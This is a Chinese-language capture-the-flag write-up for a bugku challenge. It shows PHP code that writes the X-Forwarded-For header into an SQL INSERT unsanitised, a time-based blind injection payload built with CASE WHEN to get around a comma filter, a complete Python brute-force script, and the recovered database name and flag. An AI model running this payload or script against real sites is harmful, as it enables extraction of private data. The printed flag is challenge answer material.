CTF – bugku – INSERT INTO 注入

题目说明

题目来源: ctf.bugku.com

直达: http://120.24.86.145:9004/

题目分析

题目给出代码

PHP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;

$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>

代码获取HTTP头 X-Forwarded-For 写入数据库,是典型的 INSERT INTO 注入

构造语句

经过测试发现过滤了逗号 ,所以不能使用 if 语句,但是可以使用具有相同用处的 select case when 语句1 then 语句2 else 语句3 end; 当语句1为真,执行语句2,否则执行语句3

所以最后 Payload

123'+(select case when ascii(substr((database()) from 1 for 1))= 65 then sleep(2) else 0 end))#

爆破代码

Python 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: virgin-forest
# Time: 2018-09-11 10:28:18
# Describe:

import time
import requests
from bs4 import BeautifulSoup

def get_html(header):

url = "http://120.24.86.145:8002/web15/"

headers = {
"X-Forwarded-For":""
}

headers['X-Forwarded-For'] = header

start_time = time.time()
html = requests.get(url,headers=headers)
stop_time = time.time()

return(stop_time-start_time)

def get_database():
chars = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/='
name = ''
for i in range(1,100):
key = 0
for char in chars:
char_ascii = ord(char)
payload = "123'+(select case when ascii(substr((database()) from {0} for 1))={1} then sleep(2) else 0 end))#".format(i,char_ascii)
time = get_html(payload)
if time > 2:
name += char
key = 1
break
if key == 0:
break
print("database:",name)

get_database()

def get_flag():
chars = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/='
name = ''
for i in range(1,100):
key = 0
for char in chars:
char_ascii = ord(char)
payload = "123'+(select case when ascii(substr((select flag from flag) from {0} for 1))={1} then sleep(2) else 0 end))#".format(i,char_ascii)
time = get_html(payload)
if time > 2:
name += char
key = 1
break
if key == 0:
break
print("flag:",name)

get_flag()

爆破结果

database: web15
flag: cdbf14c9551d5be5612f7bb5d2867853
[Finished in 108.0s]